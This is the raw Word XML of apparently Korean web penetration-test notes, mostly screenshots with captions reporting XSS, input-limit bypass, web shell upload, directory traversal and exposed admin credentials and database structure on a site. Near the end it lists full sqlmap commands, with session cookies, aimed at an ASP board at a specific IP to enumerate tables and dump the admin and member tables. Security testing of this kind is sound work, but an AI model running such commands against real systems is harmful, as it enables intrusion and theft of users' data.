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49383" w14:textId="1830C8AD" w:rsidR="00E47AD3" w:rsidRDefault="00DA5A38">
      <w:r w:rsidRPr="00DA5A38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0632B4D3" wp14:editId="520D9197">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>23436</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4305901" cy="3000794"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2129603116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03116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0007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아이디 찾기 누르면 script 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFF1A3" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="5CA21323" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="333BBD5A" w14:textId="2DBB415A" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="2FF609D6" w14:textId="16EC5087" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="27654A1B" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="5D9866AD" w14:textId="62588212" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="53DC3281" w14:textId="6B212216" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="31B526AE" w14:textId="7B015AB8" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="2433EBCA" w14:textId="11EAEA7A" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38">
      <w:r w:rsidRPr="00DA5A38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="028E7344" wp14:editId="27327224">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>20852</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3648584" cy="1286054"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="480782838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82838" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라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2860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오류 유형 표시</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5CB4D" w14:textId="23DBEBFC" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="64C57CAB" w14:textId="0A2BB573" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="1DF85D53" w14:textId="5842B90A" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="7A589DA9" w14:textId="7AEFA254" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38">
      <w:r w:rsidRPr="00DA5A38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BA7B875" wp14:editId="5633645B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>27084</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3204210" cy="3726815"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="26035"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1283391908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91908" name="그림 1" descr="텍스트, 스크린샷, 폰트, 문서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37268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742361C5" w14:textId="6AAFF24F" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="1C5B6521" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="65B72558" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="049A693F" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="30087D68" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="67D8409C" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="4920778E" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="30772DA7" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="3364081B" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="1E8DE169" w14:textId="77777777" w:rsidR="00DA5A38" w:rsidRDefault="00DA5A38"/>
    <w:p w14:paraId="63E524C5" w14:textId="219860E8" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="00A35A3B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6A6BE92" wp14:editId="6DCA7188">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>32341</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3444875" cy="2876550"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="19050"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="291857828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57828" name="그림 1" descr="텍스트, 스크린샷, 번호, 폰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2876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회원가입</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B73BF7" w14:textId="55686931" w:rsidR="00AA35BE" w:rsidRDefault="00AA35BE" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아이디, 비밀번호 글자수 제한 해제 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B05F2" w14:textId="42724BF4" w:rsidR="00AA35BE" w:rsidRDefault="00AA35BE" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>연락처 글자수 제한</w:t>
      </w:r>
      <w:r w:rsidR="00A35A3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, 숫자만 입력</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 해제 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A620111" w14:textId="2B113CD3" w:rsidR="00AA35BE" w:rsidRDefault="00AA35BE" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="50E28846" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="13417560" w14:textId="0A8CF780" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="399E7F77" w14:textId="7DA28F0F" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="5C767068" w14:textId="60571E0B" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="006619E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07841536" wp14:editId="72A5DD0F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-10633</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>191799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3544504" cy="2977116"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="13970"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="191283984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3984" name="그림 1" descr="텍스트, 스크린샷, 번호, 폰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504" cy="29771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개인정보 수정 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690AACE" w14:textId="1D60925D" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cript 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB4E0D" w14:textId="5FF9E935" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="4D36CEC0" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="380BF131" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="56A708A9" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="781F08E4" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="2D8463E5" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="510610D0" w14:textId="77777777" w:rsidR="006619E3" w:rsidRDefault="006619E3" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="4D8DFB12" w14:textId="6EBF43F7" w:rsidR="006619E3" w:rsidRDefault="001A581C" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="00A35A3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BD9F093" wp14:editId="1329B47C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>37374</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>181049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3494635" cy="1959492"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="22225"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1233873801" name="그림 1" descr="텍스트, 스크린샷, 디스플레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73801" name="그림 1" descr="텍스트, 스크린샷, 디스플레이, 번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635" cy="19594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69E904A1" w14:textId="77777777" w:rsidR="001A581C" w:rsidRDefault="001A581C" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">게시글 작성 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672020F" w14:textId="2623DDC9" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>script 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761360E1" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="75F59107" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="1C83362C" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="5CF7A514" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="38727DAC" w14:textId="77777777" w:rsidR="00A35A3B" w:rsidRDefault="00A35A3B" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="5FE6D903" w14:textId="3F2ACE52" w:rsidR="00A35A3B" w:rsidRDefault="002E3AA2" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="002E3AA2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FAF0DD2" wp14:editId="165168A2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>23436</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3840569" cy="921737"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="12065"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="967459433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59433" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라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569" cy="9217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script 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1518D0EB" w14:textId="77777777" w:rsidR="002E3AA2" w:rsidRDefault="002E3AA2" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="22E55389" w14:textId="77777777" w:rsidR="002E3AA2" w:rsidRDefault="002E3AA2" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="47C53DA6" w14:textId="024AA0D9" w:rsidR="002E3AA2" w:rsidRDefault="00F81310" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="00F81310">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0409540B" wp14:editId="15C92AAB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3900503" cy="2721934"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="21590"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1028961846" name="그림 1" descr="텍스트, 스크린샷, 디스플레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61846" name="그림 1" descr="텍스트, 스크린샷, 디스플레이, 번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503" cy="27219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script 실행됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38181AA8" w14:textId="2C1FED19" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹쉘 업로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83FFE9" w14:textId="22A1D732" w:rsidR="002E3AA2" w:rsidRDefault="002E3AA2" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="6DF19D83" w14:textId="77777777" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="2197E161" w14:textId="77777777" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="61207E54" w14:textId="77777777" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="7F7D84D1" w14:textId="77777777" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="4D809B5C" w14:textId="02235D95" w:rsidR="00F81310" w:rsidRDefault="00F81310" w:rsidP="00D577BD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A0E309" w14:textId="12C43207" w:rsidR="00F81310" w:rsidRDefault="00D92D64" w:rsidP="00AA35BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>타고 타고</w:t>
      </w:r>
      <w:r w:rsidR="00F81310" w:rsidRPr="00F81310">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EFCF13D" wp14:editId="69AF73DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22919</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4754969" cy="1241160"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="16510"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1392872224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72224" name="그림 1" descr="텍스트, 스크린샷, 폰트, 소프트웨어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969" cy="12411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D577BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 상위 dir로 갈 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C097E" w14:textId="77777777" w:rsidR="00D577BD" w:rsidRDefault="00D577BD" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="03C097E1" w14:textId="77777777" w:rsidR="00D577BD" w:rsidRPr="00D577BD" w:rsidRDefault="00D577BD" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="28D065CD" w14:textId="03B31EA4" w:rsidR="00D577BD" w:rsidRDefault="00D577BD" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="00D577BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="620FF5BC" wp14:editId="30B72B13">
            <wp:extent cx="5731510" cy="1960880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="719536843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36843" name="그림 1" descr="텍스트, 스크린샷, 폰트,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77BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2454DBC7" wp14:editId="50CADADF">
            <wp:extent cx="1648055" cy="676369"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
            <wp:docPr id="1989145362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45362" name="그림 1" descr="텍스트, 폰트, 스크린샷, 번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763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D577BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 ID/PW 노출</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BC106" w14:textId="77777777" w:rsidR="00CC648E" w:rsidRDefault="00CC648E" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="3CC60E39" w14:textId="00FC5CFF" w:rsidR="00CC648E" w:rsidRDefault="00D92D64" w:rsidP="00AA35BE">
      <w:r w:rsidRPr="00CC648E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172B841" wp14:editId="43C44087">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2840990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2861310" cy="1756410"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="15240"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="86733244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32444" name="그림 1" descr="텍스트, 스크린샷, 폰트, 번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310" cy="1756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648E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67BD526A" wp14:editId="73354BE5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19124</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2745105" cy="2999105"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="10795"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1467863602" name="그림 1" descr="텍스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63602" name="그림 1" descr="텍스트, 스크린샷, 번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495" cy="30029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48E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DB 구조 노출됨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE4122" w14:textId="39E88CDF" w:rsidR="00CC648E" w:rsidRDefault="00CC648E" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="07849CE8" w14:textId="2CC33422" w:rsidR="00D577BD" w:rsidRDefault="00D577BD" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="50A79E38" w14:textId="77777777" w:rsidR="00B62FCC" w:rsidRDefault="00B62FCC" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="10097C30" w14:textId="77777777" w:rsidR="00B62FCC" w:rsidRDefault="00B62FCC" w:rsidP="00AA35BE"/>
    <w:p w14:paraId="00B8F8C3" w14:textId="5F2A804F" w:rsidR="00B62FCC" w:rsidRDefault="00B62FCC" w:rsidP="00B62FCC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DB 테이블 목록</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:t xml:space="preserve">sudo sqlmap -u "http://210.95.67.235:8181/board/index.asp" --cookie="ASPSESSIONIDCCDBACDD=NEMLJPFCEILONFDIDMAONOBF; oyesorder=oyes%5Forder=637123695; ASPSESSIONIDQQRRCQBT=PCJFPAGAMICKBMDKHCFBDPCA; ASPSESSIONIDACDDQARB=CFLFPAGABOPNJEGMJODDDHIC" --data "sr=yes&amp;gubun=gel&amp;p_from=down&amp;b_com=yes&amp;k=info_title&amp;w=a" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--dbs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8936E7" wp14:editId="4CA2DA20">
            <wp:extent cx="2596551" cy="1653712"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1289829180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29180" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어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4676" cy="165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A30A" w14:textId="1CDF2945" w:rsidR="00B62FCC" w:rsidRPr="00B62FCC" w:rsidRDefault="00B62FCC" w:rsidP="00B62FCC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>amel 테이블 구조</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:t xml:space="preserve">sudo sqlmap -u "http://210.95.67.235:8181/board/index.asp" --cookie="ASPSESSIONIDCCDBACDD=NEMLJPFCEILONFDIDMAONOBF; oyesorder=oyes%5Forder=637123695; ASPSESSIONIDQQRRCQBT=PCJFPAGAMICKBMDKHCFBDPCA; ASPSESSIONIDACDDQARB=CFLFPAGABOPNJEGMJODDDHIC" --data "sr=yes&amp;gubun=gel&amp;p_from=down&amp;b_com=yes&amp;k=info_title&amp;w=a" -D camel </w:t>
      </w:r>
      <w:r w:rsidR="00816C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:lastRenderedPageBreak/>
        <w:t>tables</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF004F6" wp14:editId="40229D03">
            <wp:extent cx="1981477" cy="4801270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1916182235" name="그림 1" descr="텍스트, 스크린샷, 메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82235" name="그림 1" descr="텍스트, 스크린샷, 메뉴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33C6" w14:textId="7348124D" w:rsidR="00B62FCC" w:rsidRDefault="00B62FCC" w:rsidP="00B62FCC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dmin 데이터 접근</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:t>sudo sqlmap -u "http://210.95.67.235:8181/board/index.asp" --cookie="ASPSESSIONIDCCDBACDD=NEMLJPFCEILONFDIDMAONOBF; oyesorder=oyes%5Forder=637123695; ASPSESSIONIDQQRRCQBT=PCJFPAGAMICKBMDKHCFBDPCA; ASPSESSIONIDACDDQARB=CFLFPAGABOPNJEGMJODDDHIC" --data "sr=yes&amp;gubun=gel&amp;p_from=down&amp;b_com=yes&amp;k=info_title&amp;w=a" -D camel -T admin</w:t>
      </w:r>
      <w:r w:rsidR="00816C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B62FCC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FAA1A80" wp14:editId="3BC795C3">
            <wp:extent cx="2124075" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1930702017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02017" name="그림 1" descr="텍스트, 폰트, 스크린샷, 번호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E4C1" w14:textId="77777777" w:rsidR="00B62FCC" w:rsidRDefault="00B62FCC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCF14CB" w14:textId="65D90F4F" w:rsidR="00B62FCC" w:rsidRDefault="00E302F2" w:rsidP="00E302F2">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>모든 사용자 정보</w:t>
      </w:r>
      <w:r w:rsidR="00A24B8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 확인 가능</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E302F2">
        <w:t xml:space="preserve">sudo sqlmap -u "http://210.95.67.235:8181/board/index.asp" --cookie="ASPSESSIONIDCCDBACDD=NEMLJPFCEILONFDIDMAONOBF; oyesorder=oyes%5Forder=637123695; ASPSESSIONIDQQRRCQBT=PCJFPAGAMICKBMDKHCFBDPCA; ASPSESSIONIDACDDQARB=CFLFPAGABOPNJEGMJODDDHIC" --data "sr=yes&amp;gubun=gel&amp;p_from=down&amp;b_com=yes&amp;k=info_title&amp;w=a" -D camel -T member </w:t>
      </w:r>
      <w:r w:rsidR="00ED5268">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00E302F2">
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidR="00ED5268">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A24B8C" w:rsidRPr="00A24B8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA67D83" wp14:editId="040F5EAC">
            <wp:extent cx="5372356" cy="1871932"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="837173136" name="그림 1" descr="텍스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73136" name="그림 1" descr="텍스트, 스크린샷, 번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5771" cy="187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3DC7" w14:textId="77777777" w:rsidR="00A24B8C" w:rsidRPr="00B62FCC" w:rsidRDefault="00A24B8C" w:rsidP="00A24B8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
